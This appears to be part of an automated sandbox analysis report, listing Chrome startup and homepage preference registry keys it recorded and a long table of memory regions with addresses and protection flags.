HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
227A3924000
|
heap
|
page read and write
|
|
|
|
227A3780000
|
heap
|
page read and write
|
|
|
|
20D5BC53000
|
heap
|
page read and write
|
||
|
1CBF5F08000
|
heap
|
page read and write
|
||
|
20D5C583000
|
heap
|
page read and write
|
||
|
1AC533F5000
|
heap
|
page read and write
|
||
|
20D5C940000
|
remote allocation
|
page read and write
|
||
|
20D5C511000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
20D5C59B000
|
heap
|
page read and write
|
||
|
20D5C56A000
|
heap
|
page read and write
|
||
|
21057E8C000
|
heap
|
page read and write
|
||
|
1CBF5F06000
|
heap
|
page read and write
|
||
|
20D5BC87000
|
heap
|
page read and write
|
||
|
1CBF5EF9000
|
heap
|
page read and write
|
||
|
1AC53660000
|
trusted library allocation
|
page read and write
|
||
|
205EE463000
|
heap
|
page read and write
|
||
|
227A3855000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
40CE7F000
|
stack
|
page read and write
|
||
|
1CBF068C000
|
heap
|
page read and write
|
||
|
22D7D0CF000
|
heap
|
page read and write
|
||
|
5DECA78000
|
stack
|
page read and write
|
||
|
88705FB000
|
stack
|
page read and write
|
||
|
205EE467000
|
heap
|
page read and write
|
||
|
205EE45F000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
1CBF5D70000
|
trusted library allocation
|
page read and write
|
||
|
25DC8900000
|
heap
|
page read and write
|
||
|
20D5C588000
|
heap
|
page read and write
|
||
|
1CBF5F06000
|
heap
|
page read and write
|
||
|
1CBF0691000
|
heap
|
page read and write
|
||
|
40C7F8000
|
stack
|
page read and write
|
||
|
227A6E5D000
|
heap
|
page read and write
|
||
|
1CBF6020000
|
trusted library allocation
|
page read and write
|
||
|
20D5C570000
|
heap
|
page read and write
|
||
|
20D5C5D2000
|
heap
|
page read and write
|
||
|
20D5C564000
|
heap
|
page read and write
|
||
|
25DC8902000
|
heap
|
page read and write
|
||
|
20D5C5AC000
|
heap
|
page read and write
|
||
|
20D5BC54000
|
heap
|
page read and write
|
||
|
1CBF5D58000
|
trusted library allocation
|
page read and write
|
||
|
20D5C570000
|
heap
|
page read and write
|
||
|
20D5BAA0000
|
heap
|
page read and write
|
||
|
36222FE000
|
stack
|
page read and write
|
||
|
5DEC8FE000
|
stack
|
page read and write
|
||
|
25DC8889000
|
heap
|
page read and write
|
||
|
1CBF0FE3000
|
trusted library allocation
|
page read and write
|
||
|
EE2827F000
|
stack
|
page read and write
|
||
|
1CBF5F04000
|
heap
|
page read and write
|
||
|
205EE469000
|
heap
|
page read and write
|
||
|
20D5BC13000
|
heap
|
page read and write
|
||
|
1AC543E0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF1870000
|
trusted library section
|
page readonly
|
||
|
1CBF5D5A000
|
trusted library allocation
|
page read and write
|
||
|
227A5110000
|
heap
|
page read and write
|
||
|
1CBF5EF6000
|
heap
|
page read and write
|
||
|
1EB2A228000
|
heap
|
page read and write
|
||
|
20D5C56B000
|
heap
|
page read and write
|
||
|
1EB2A27C000
|
heap
|
page read and write
|
||
|
20D5C59B000
|
heap
|
page read and write
|
||
|
227A3798000
|
heap
|
page read and write
|
||
|
20D5C5AE000
|
heap
|
page read and write
|
||
|
5DEC47B000
|
stack
|
page read and write
|
||
|
362287F000
|
stack
|
page read and write
|
||
|
21057E4D000
|
heap
|
page read and write
|
||
|
227A6E5D000
|
heap
|
page read and write
|
||
|
1CBF1280000
|
trusted library allocation
|
page read and write
|
||
|
20D5C593000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
20D5C590000
|
heap
|
page read and write
|
||
|
20D5BC27000
|
heap
|
page read and write
|
||
|
1CBF5F2C000
|
heap
|
page read and write
|
||
|
20D5C5B0000
|
heap
|
page read and write
|
||
|
20D5C59B000
|
heap
|
page read and write
|
||
|
EE282FF000
|
stack
|
page read and write
|
||
|
1CBF0FF0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5D74000
|
trusted library allocation
|
page read and write
|
||
|
20D5BC3C000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
20D5BC00000
|
heap
|
page read and write
|
||
|
669E87B000
|
stack
|
page read and write
|
||
|
3622677000
|
stack
|
page read and write
|
||
|
20D5C54C000
|
heap
|
page read and write
|
||
|
22D7D0C7000
|
heap
|
page read and write
|
||
|
36224FB000
|
stack
|
page read and write
|
||
|
1AC533E0000
|
heap
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
1CBF5F0D000
|
heap
|
page read and write
|
||
|
88701CB000
|
stack
|
page read and write
|
||
|
5DEC77E000
|
stack
|
page read and write
|
||
|
1CBF5D80000
|
trusted library allocation
|
page read and write
|
||
|
F803BFE000
|
stack
|
page read and write
|
||
|
362227E000
|
stack
|
page read and write
|
||
|
20D5C5A9000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
1CBF1890000
|
trusted library section
|
page readonly
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
1AC53600000
|
trusted library allocation
|
page read and write
|
||
|
3621FEB000
|
stack
|
page read and write
|
||
|
20D5BC6F000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
21057F13000
|
heap
|
page read and write
|
||
|
1CBF18B0000
|
trusted library section
|
page readonly
|
||
|
88706FB000
|
stack
|
page read and write
|
||
|
205EE461000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
21057E4B000
|
heap
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
DFF407E000
|
stack
|
page read and write
|
||
|
21057E13000
|
heap
|
page read and write
|
||
|
1CBF0678000
|
heap
|
page read and write
|
||
|
1AC53330000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F12000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
227A3880000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
1CBF5F06000
|
heap
|
page read and write
|
||
|
20D5BCE1000
|
heap
|
page read and write
|
||
|
20D5BCC0000
|
heap
|
page read and write
|
||
|
22D7D0A0000
|
heap
|
page read and write
|
||
|
EE27F9B000
|
stack
|
page read and write
|
||
|
1CBF5EAF000
|
heap
|
page read and write
|
||
|
EE284FB000
|
stack
|
page read and write
|
||
|
1CBF0629000
|
heap
|
page read and write
|
||
|
20D5C599000
|
heap
|
page read and write
|
||
|
20D5C570000
|
heap
|
page read and write
|
||
|
669EA7B000
|
stack
|
page read and write
|
||
|
1CBF06FF000
|
heap
|
page read and write
|
||
|
227A52A0000
|
heap
|
page read and write
|
||
|
36223FB000
|
stack
|
page read and write
|
||
|
20D5C500000
|
heap
|
page read and write
|
||
|
1CBF5E00000
|
heap
|
page read and write
|
||
|
1AC543C0000
|
heap
|
page readonly
|
||
|
1CBF0540000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
21057E70000
|
heap
|
page read and write
|
||
|
227A3789000
|
heap
|
page read and write
|
||
|
25DC8870000
|
heap
|
page read and write
|
||
|
205EE230000
|
heap
|
page read and write
|
||
|
20D5C5BB000
|
heap
|
page read and write
|
||
|
EE287FF000
|
stack
|
page read and write
|
||
|
20D5C58C000
|
heap
|
page read and write
|
||
|
21057E00000
|
heap
|
page read and write
|
||
|
1CBF0673000
|
heap
|
page read and write
|
||
|
1EB2A200000
|
heap
|
page read and write
|
||
|
25DC884D000
|
heap
|
page read and write
|
||
|
1CBF1118000
|
heap
|
page read and write
|
||
|
1CBF0702000
|
heap
|
page read and write
|
||
|
F803B79000
|
stack
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
205EE413000
|
heap
|
page read and write
|
||
|
1CBF5EFF000
|
heap
|
page read and write
|
||
|
1CBF5F2C000
|
heap
|
page read and write
|
||
|
1CBF5D51000
|
trusted library allocation
|
page read and write
|
||
|
1CBF06A1000
|
heap
|
page read and write
|
||
|
1CBF6070000
|
trusted library allocation
|
page read and write
|
||
|
227A386A000
|
heap
|
page read and write
|
||
|
1CBF5EA8000
|
heap
|
page read and write
|
||
|
20D5C5B5000
|
heap
|
page read and write
|
||
|
1CBF1118000
|
heap
|
page read and write
|
||
|
22D7D0AB000
|
heap
|
page read and write
|
||
|
20D5C5A4000
|
heap
|
page read and write
|
||
|
25DC887A000
|
heap
|
page read and write
|
||
|
20D5BC56000
|
heap
|
page read and write
|
||
|
40CCFB000
|
stack
|
page read and write
|
||
|
20D5C58E000
|
heap
|
page read and write
|
||
|
20D5C597000
|
heap
|
page read and write
|
||
|
EE285F7000
|
stack
|
page read and write
|
||
|
5DEC27B000
|
stack
|
page read and write
|
||
|
5DEC877000
|
stack
|
page read and write
|
||
|
F803A7F000
|
stack
|
page read and write
|
||
|
20D5CA21000
|
heap
|
page read and write
|
||
|
205EE400000
|
heap
|
page read and write
|
||
|
1AC54170000
|
trusted library allocation
|
page read and write
|
||
|
21057E29000
|
heap
|
page read and write
|
||
|
1CBF06BD000
|
heap
|
page read and write
|
||
|
205EE48C000
|
heap
|
page read and write
|
||
|
20D5C58E000
|
heap
|
page read and write
|
||
|
20D5BC29000
|
heap
|
page read and write
|
||
|
1CBF5F2C000
|
heap
|
page read and write
|
||
|
20D5C513000
|
heap
|
page read and write
|
||
|
205EE481000
|
heap
|
page read and write
|
||
|
20D5C515000
|
heap
|
page read and write
|
||
|
22D7D070000
|
heap
|
page read and write
|
||
|
227A3828000
|
heap
|
page read and write
|
||
|
1CBF6060000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F2C000
|
heap
|
page read and write
|
||
|
205EE508000
|
heap
|
page read and write
|
||
|
1CBF119D000
|
heap
|
page read and write
|
||
|
1CBF5F06000
|
heap
|
page read and write
|
||
|
1CBF5F08000
|
heap
|
page read and write
|
||
|
1CBF5F2E000
|
heap
|
page read and write
|
||
|
205EE44A000
|
heap
|
page read and write
|
||
|
22D7D0B7000
|
heap
|
page read and write
|
||
|
20D5CA00000
|
heap
|
page read and write
|
||
|
20D5C55B000
|
heap
|
page read and write
|
||
|
20D5C940000
|
remote allocation
|
page read and write
|
||
|
20D5C5AC000
|
heap
|
page read and write
|
||
|
22D7D0E0000
|
heap
|
page read and write
|
||
|
88704FF000
|
stack
|
page read and write
|
||
|
22D7D0B7000
|
heap
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
20D5BA30000
|
heap
|
page read and write
|
||
|
1CBF5E61000
|
heap
|
page read and write
|
||
|
1AC533B0000
|
heap
|
page read and write
|
||
|
227A3827000
|
heap
|
page read and write
|
||
|
1CBF5EF9000
|
heap
|
page read and write
|
||
|
227A3620000
|
heap
|
page read and write
|
||
|
21057C70000
|
heap
|
page read and write
|
||
|
25DC884C000
|
heap
|
page read and write
|
||
|
1CBF5EE0000
|
heap
|
page read and write
|
||
|
205EE45B000
|
heap
|
page read and write
|
||
|
1CBF1159000
|
heap
|
page read and write
|
||
|
20D5C56A000
|
heap
|
page read and write
|
||
|
205EE429000
|
heap
|
page read and write
|
||
|
1AC533D0000
|
heap
|
page read and write
|
||
|
1CBF61F0000
|
trusted library allocation
|
page read and write
|
||
|
205EE513000
|
heap
|
page read and write
|
||
|
1CBF1113000
|
heap
|
page read and write
|
||
|
20D5BC4D000
|
heap
|
page read and write
|
||
|
5DEC37E000
|
stack
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
1EB29FD0000
|
heap
|
page read and write
|
||
|
1CBF61E0000
|
trusted library allocation
|
page read and write
|
||
|
25DC8855000
|
heap
|
page read and write
|
||
|
20D5C55B000
|
heap
|
page read and write
|
||
|
227A3920000
|
heap
|
page read and write
|
||
|
1CBF5D50000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5D94000
|
trusted library allocation
|
page read and write
|
||
|
25DC8857000
|
heap
|
page read and write
|
||
|
20D5C55B000
|
heap
|
page read and write
|
||
|
20D5C5AB000
|
heap
|
page read and write
|
||
|
1CBF5E9B000
|
heap
|
page read and write
|
||
|
1CBF067C000
|
heap
|
page read and write
|
||
|
25DC8858000
|
heap
|
page read and write
|
||
|
21057CE0000
|
heap
|
page read and write
|
||
|
1CBF5D57000
|
trusted library allocation
|
page read and write
|
||
|
25DC8859000
|
heap
|
page read and write
|
||
|
20D5C588000
|
heap
|
page read and write
|
||
|
22D7D0C3000
|
heap
|
page read and write
|
||
|
20D5C55B000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
1AC535F0000
|
trusted library allocation
|
page read and write
|
||
|
9D4932B000
|
stack
|
page read and write
|
||
|
205EE460000
|
heap
|
page read and write
|
||
|
1AC5341D000
|
heap
|
page read and write
|
||
|
1CBF5F08000
|
heap
|
page read and write
|
||
|
205EEC02000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F15000
|
heap
|
page read and write
|
||
|
40C9FA000
|
stack
|
page read and write
|
||
|
1CBF5F0A000
|
heap
|
page read and write
|
||
|
20D5BCAB000
|
heap
|
page read and write
|
||
|
1CBF5E40000
|
heap
|
page read and write
|
||
|
20D5BCEA000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
1CBF6250000
|
trusted library allocation
|
page read and write
|
||
|
1AC53417000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
DFF3BC9000
|
stack
|
page read and write
|
||
|
21057C80000
|
heap
|
page read and write
|
||
|
25DC8826000
|
heap
|
page read and write
|
||
|
1CBF063E000
|
heap
|
page read and write
|
||
|
40C3AB000
|
stack
|
page read and write
|
||
|
1CBF0658000
|
heap
|
page read and write
|
||
|
1EB2A140000
|
trusted library allocation
|
page read and write
|
||
|
227A56F0000
|
heap
|
page read and write
|
||
|
362277F000
|
stack
|
page read and write
|
||
|
22D7D2D5000
|
heap
|
page read and write
|
||
|
227A3843000
|
heap
|
page read and write
|
||
|
1CBF0600000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
1AC54430000
|
trusted library allocation
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
1CBF1118000
|
heap
|
page read and write
|
||
|
205EE477000
|
heap
|
page read and write
|
||
|
20D5BC4B000
|
heap
|
page read and write
|
||
|
1CBF5D90000
|
trusted library allocation
|
page read and write
|
||
|
1EB2A300000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
20D5C58F000
|
heap
|
page read and write
|
||
|
1EB2A213000
|
heap
|
page read and write
|
||
|
20D5C940000
|
remote allocation
|
page read and write
|
||
|
1CBF119A000
|
heap
|
page read and write
|
||
|
20D5C564000
|
heap
|
page read and write
|
||
|
1EB2AA02000
|
trusted library allocation
|
page read and write
|
||
|
25DC8813000
|
heap
|
page read and write
|
||
|
1CBF60B0000
|
remote allocation
|
page read and write
|
||
|
227A3824000
|
heap
|
page read and write
|
||
|
1CBF5F29000
|
heap
|
page read and write
|
||
|
DFF417F000
|
stack
|
page read and write
|
||
|
1EB2A202000
|
heap
|
page read and write
|
||
|
20D5C55C000
|
heap
|
page read and write
|
||
|
40CEFF000
|
stack
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
227A381F000
|
heap
|
page read and write
|
||
|
20D5C5DC000
|
heap
|
page read and write
|
||
|
F8037FF000
|
stack
|
page read and write
|
||
|
9D49879000
|
stack
|
page read and write
|
||
|
DFF3FFE000
|
stack
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
20D5C5A9000
|
heap
|
page read and write
|
||
|
20D5C55B000
|
heap
|
page read and write
|
||
|
1CBF0695000
|
heap
|
page read and write
|
||
|
1CBF5EA0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5D56000
|
trusted library allocation
|
page read and write
|
||
|
20D5C55C000
|
heap
|
page read and write
|
||
|
40C8FA000
|
stack
|
page read and write
|
||
|
22D7D2D0000
|
heap
|
page read and write
|
||
|
1CBF5E0F000
|
heap
|
page read and write
|
||
|
20D5C597000
|
heap
|
page read and write
|
||
|
1CBF1780000
|
trusted library allocation
|
page read and write
|
||
|
1CBF1690000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F0A000
|
heap
|
page read and write
|
||
|
20D5C597000
|
heap
|
page read and write
|
||
|
21057F08000
|
heap
|
page read and write
|
||
|
20D5C561000
|
heap
|
page read and write
|
||
|
1CBF5C40000
|
trusted library allocation
|
page read and write
|
||
|
1CBF05F0000
|
trusted library section
|
page read and write
|
||
|
227A392E000
|
heap
|
page read and write
|
||
|
1CBF5D90000
|
trusted library allocation
|
page read and write
|
||
|
20D5C591000
|
heap
|
page read and write
|
||
|
1CBF5D80000
|
trusted library allocation
|
page read and write
|
||
|
25DC8913000
|
heap
|
page read and write
|
||
|
5DEC677000
|
stack
|
page read and write
|
||
|
205EE500000
|
heap
|
page read and write
|
||
|
205EE46A000
|
heap
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
1CBF5F2F000
|
heap
|
page read and write
|
||
|
227A3856000
|
heap
|
page read and write
|
||
|
20D5BD16000
|
heap
|
page read and write
|
||
|
20D5BBA0000
|
trusted library allocation
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
22D7D0CF000
|
heap
|
page read and write
|
||
|
20D5C58C000
|
heap
|
page read and write
|
||
|
22D7D0C5000
|
heap
|
page read and write
|
||
|
20D5C5A9000
|
heap
|
page read and write
|
||
|
1CBF5F03000
|
heap
|
page read and write
|
||
|
1AC53670000
|
heap
|
page read and write
|
||
|
40CD7F000
|
stack
|
page read and write
|
||
|
1AC53679000
|
heap
|
page read and write
|
||
|
20D5BC50000
|
heap
|
page read and write
|
||
|
20D5C59B000
|
heap
|
page read and write
|
||
|
1CBF5F0D000
|
heap
|
page read and write
|
||
|
20D5BD13000
|
heap
|
page read and write
|
||
|
1CBF1670000
|
trusted library allocation
|
page read and write
|
||
|
20D5C59B000
|
heap
|
page read and write
|
||
|
1CBF1159000
|
heap
|
page read and write
|
||
|
20D5C568000
|
heap
|
page read and write
|
||
|
9D497FE000
|
stack
|
page read and write
|
||
|
1CBF5E22000
|
heap
|
page read and write
|
||
|
20D5C571000
|
heap
|
page read and write
|
||
|
1CBF1860000
|
trusted library section
|
page readonly
|
||
|
20D5C5A3000
|
heap
|
page read and write
|
||
|
22D7D0CF000
|
heap
|
page read and write
|
||
|
20D5C5AF000
|
heap
|
page read and write
|
||
|
25DC888F000
|
heap
|
page read and write
|
||
|
227A37C2000
|
heap
|
page read and write
|
||
|
22D7D0C6000
|
heap
|
page read and write
|
||
|
20D5BA40000
|
heap
|
page read and write
|
||
|
1EB29FE0000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
88707F7000
|
stack
|
page read and write
|
||
|
1CBF6090000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F0C000
|
heap
|
page read and write
|
||
|
25DC884F000
|
heap
|
page read and write
|
||
|
20D5C59F000
|
heap
|
page read and write
|
||
|
1CBF5D50000
|
trusted library allocation
|
page read and write
|
||
|
227A52A4000
|
heap
|
page read and write
|
||
|
22D7D270000
|
heap
|
page read and write
|
||
|
20D5BD02000
|
heap
|
page read and write
|
||
|
20D5C570000
|
heap
|
page read and write
|
||
|
1CBF6080000
|
trusted library allocation
|
page read and write
|
||
|
21057F02000
|
heap
|
page read and write
|
||
|
1EB2A257000
|
heap
|
page read and write
|
||
|
205EE1C0000
|
heap
|
page read and write
|
||
|
1CBF1000000
|
heap
|
page read and write
|
||
|
205EE502000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
20D5C583000
|
heap
|
page read and write
|
||
|
88709FC000
|
stack
|
page read and write
|
||
|
227A3872000
|
heap
|
page read and write
|
||
|
1CBF1660000
|
trusted library allocation
|
page read and write
|
||
|
1CBF0FC1000
|
trusted library allocation
|
page read and write
|
||
|
21057E47000
|
heap
|
page read and write
|
||
|
1AC533D8000
|
heap
|
page read and write
|
||
|
1CBF5F08000
|
heap
|
page read and write
|
||
|
22D7D0DF000
|
heap
|
page read and write
|
||
|
21057E4F000
|
heap
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
1CBF5ED9000
|
heap
|
page read and write
|
||
|
20D5C58E000
|
heap
|
page read and write
|
||
|
20D5C588000
|
heap
|
page read and write
|
||
|
20D5C562000
|
heap
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
F80377A000
|
stack
|
page read and write
|
||
|
5DEC2FD000
|
stack
|
page read and write
|
||
|
EE283FB000
|
stack
|
page read and write
|
||
|
21057F00000
|
heap
|
page read and write
|
||
|
1CBF60B0000
|
remote allocation
|
page read and write
|
||
|
205EE1D0000
|
heap
|
page read and write
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
25DC8720000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
21057E49000
|
heap
|
page read and write
|
||
|
669EB7E000
|
stack
|
page read and write
|
||
|
25DC87C0000
|
trusted library allocation
|
page read and write
|
||
|
20D5CA3E000
|
heap
|
page read and write
|
||
|
1AC53680000
|
trusted library allocation
|
page read and write
|
||
|
1CBF1500000
|
trusted library allocation
|
page read and write
|
||
|
227A3760000
|
heap
|
page read and write
|
||
|
20D5C585000
|
heap
|
page read and write
|
||
|
1CBF5EFF000
|
heap
|
page read and write
|
||
|
227A3872000
|
heap
|
page read and write
|
||
|
1CBF05B0000
|
heap
|
page read and write
|
||
|
25DC9202000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F03000
|
heap
|
page read and write
|
||
|
20D5C5AE000
|
heap
|
page read and write
|
||
|
20D5BCA4000
|
heap
|
page read and write
|
||
|
1EB2A313000
|
heap
|
page read and write
|
||
|
F803AFE000
|
stack
|
page read and write
|
||
|
1CBF5F04000
|
heap
|
page read and write
|
||
|
205EE465000
|
heap
|
page read and write
|
||
|
20D5C5B3000
|
heap
|
page read and write
|
||
|
1CBF1118000
|
heap
|
page read and write
|
||
|
1AC543B0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F0A000
|
heap
|
page read and write
|
||
|
21057E3C000
|
heap
|
page read and write
|
||
|
5DEC97F000
|
unkown
|
page read and write
|
||
|
1CBF119D000
|
heap
|
page read and write
|
||
|
25DC884B000
|
heap
|
page read and write
|
||
|
40CFFE000
|
stack
|
page read and write
|
||
|
20D5CA1A000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
20D5C5A5000
|
heap
|
page read and write
|
||
|
227A6E40000
|
heap
|
page read and write
|
||
|
227A3836000
|
heap
|
page read and write
|
||
|
20D5C582000
|
heap
|
page read and write
|
||
|
1CBF0550000
|
heap
|
page read and write
|
||
|
205EE449000
|
heap
|
page read and write
|
||
|
20D5BCF4000
|
heap
|
page read and write
|
||
|
20D5C564000
|
heap
|
page read and write
|
||
|
20D5C58E000
|
heap
|
page read and write
|
||
|
20D5BD08000
|
heap
|
page read and write
|
||
|
25DC8790000
|
heap
|
page read and write
|
||
|
1CBF5F0A000
|
heap
|
page read and write
|
||
|
25DC8908000
|
heap
|
page read and write
|
||
|
1EB2A302000
|
heap
|
page read and write
|
||
|
20D5C587000
|
heap
|
page read and write
|
||
|
20D5BCC7000
|
heap
|
page read and write
|
||
|
25DC883C000
|
heap
|
page read and write
|
||
|
205EE45E000
|
heap
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
1CBF0613000
|
heap
|
page read and write
|
||
|
1CBF5E2E000
|
heap
|
page read and write
|
||
|
22D7D0B2000
|
heap
|
page read and write
|
||
|
1CBF5C30000
|
trusted library allocation
|
page read and write
|
||
|
362257F000
|
stack
|
page read and write
|
||
|
1CBF1880000
|
trusted library section
|
page readonly
|
||
|
20D5C58A000
|
heap
|
page read and write
|
||
|
9D4977F000
|
stack
|
page read and write
|
||
|
20D5C586000
|
heap
|
page read and write
|
||
|
25DC8850000
|
heap
|
page read and write
|
||
|
227A3900000
|
heap
|
page read and write
|
||
|
40CF7F000
|
stack
|
page read and write
|
||
|
1CBF0FE0000
|
trusted library allocation
|
page read and write
|
||
|
1AC5341E000
|
heap
|
page read and write
|
||
|
20D5C5A8000
|
heap
|
page read and write
|
||
|
25DC8852000
|
heap
|
page read and write
|
||
|
669E36C000
|
stack
|
page read and write
|
||
|
20D5C597000
|
heap
|
page read and write
|
||
|
20D5C590000
|
heap
|
page read and write
|
||
|
20D5CA1A000
|
heap
|
page read and write
|
||
|
1EB2A23E000
|
heap
|
page read and write
|
||
|
25DC8730000
|
heap
|
page read and write
|
||
|
1CBF60A0000
|
trusted library allocation
|
page read and write
|
||
|
205EE330000
|
trusted library allocation
|
page read and write
|
||
|
227A381B000
|
heap
|
page read and write
|
||
|
25DC8847000
|
heap
|
page read and write
|
||
|
1AC53416000
|
heap
|
page read and write
|
||
|
1AC53390000
|
heap
|
page read and write
|
||
|
20D5CA02000
|
heap
|
page read and write
|
||
|
21058602000
|
trusted library allocation
|
page read and write
|
||
|
40CBFA000
|
stack
|
page read and write
|
||
|
1CBF5E4D000
|
heap
|
page read and write
|
||
|
1CBF0713000
|
heap
|
page read and write
|
||
|
40D2FF000
|
stack
|
page read and write
|
||
|
227A382F000
|
heap
|
page read and write
|
||
|
1AC5341D000
|
heap
|
page read and write
|
||
|
20D5CA21000
|
heap
|
page read and write
|
||
|
20D5C575000
|
heap
|
page read and write
|
||
|
1AC53675000
|
heap
|
page read and write
|
||
|
1CBF1C00000
|
trusted library allocation
|
page read and write
|
||
|
1AC53320000
|
heap
|
page read and write
|
||
|
669E97B000
|
stack
|
page read and write
|
||
|
1CBF05E0000
|
trusted library allocation
|
page read and write
|
||
|
1CBF5F19000
|
heap
|
page read and write
|
||
|
40CDFF000
|
stack
|
page read and write
|
||
|
25DC8846000
|
heap
|
page read and write
|
||
|
1CBF5EB0000
|
trusted library allocation
|
page read and write
|
||
|
20D5C591000
|
heap
|
page read and write
|
||
|
20D5C593000
|
heap
|
page read and write
|
||
|
25DC8829000
|
heap
|
page read and write
|
||
|
205EE43C000
|
heap
|
page read and write
|
||
|
227A3872000
|
heap
|
page read and write
|
||
|
1CBF60C0000
|
trusted library allocation
|
page read and write
|
||
|
22D7D010000
|
heap
|
page read and write
|
||
|
1CBF5F08000
|
heap
|
page read and write
|
||
|
21057E81000
|
heap
|
page read and write
|
||
|
1CBF60B0000
|
remote allocation
|
page read and write
|
||
|
DFF3F7E000
|
stack
|
page read and write
|
||
|
1CBF5D71000
|
trusted library allocation
|
page read and write
|
||
|
DFF41FE000
|
stack
|
page read and write
|
||
|
1CBF5D55000
|
trusted library allocation
|
page read and write
|
||
|
1CBF1100000
|
heap
|
page read and write
|
||
|
1CBF5F10000
|
heap
|
page read and write
|
||
|
40D0F9000
|
stack
|
page read and write
|
||
|
1EB2A040000
|
heap
|
page read and write
|
||
|
205EE45C000
|
heap
|
page read and write
|
||
|
20D5C57D000
|
heap
|
page read and write
|
||
|
21057DE0000
|
trusted library allocation
|
page read and write
|
||
|
227A6E41000
|
heap
|
page read and write
|
||
|
1CBF1118000
|
heap
|
page read and write
|
||
|
20D5BCD8000
|
heap
|
page read and write
|
||
|
1CBF068F000
|
heap
|
page read and write
|
||
|
20D5C575000
|
heap
|
page read and write
|
||
|
1CBF5F0E000
|
heap
|
page read and write
|
||
|
20D5C58F000
|
heap
|
page read and write
|
||
|
1CBF5D5E000
|
trusted library allocation
|
page read and write
|
||
|
227A386A000
|
heap
|
page read and write
|
||
|
1CBF18A0000
|
trusted library section
|
page readonly
|
||
|
887047E000
|
stack
|
page read and write
|
||
|
F803C7C000
|
stack
|
page read and write
|
||
|
5DEC578000
|
stack
|
page read and write
|
||
|
1CBF7000000
|
heap
|
page read and write
|
||
|
20D5C588000
|
heap
|
page read and write
|
||
|
20D5BCB0000
|
heap
|
page read and write
|
||
|
88708FF000
|
stack
|
page read and write
|
||
|
1CBF5F02000
|
heap
|
page read and write
|
||
|
1CBF1002000
|
heap
|
page read and write
|
||
|
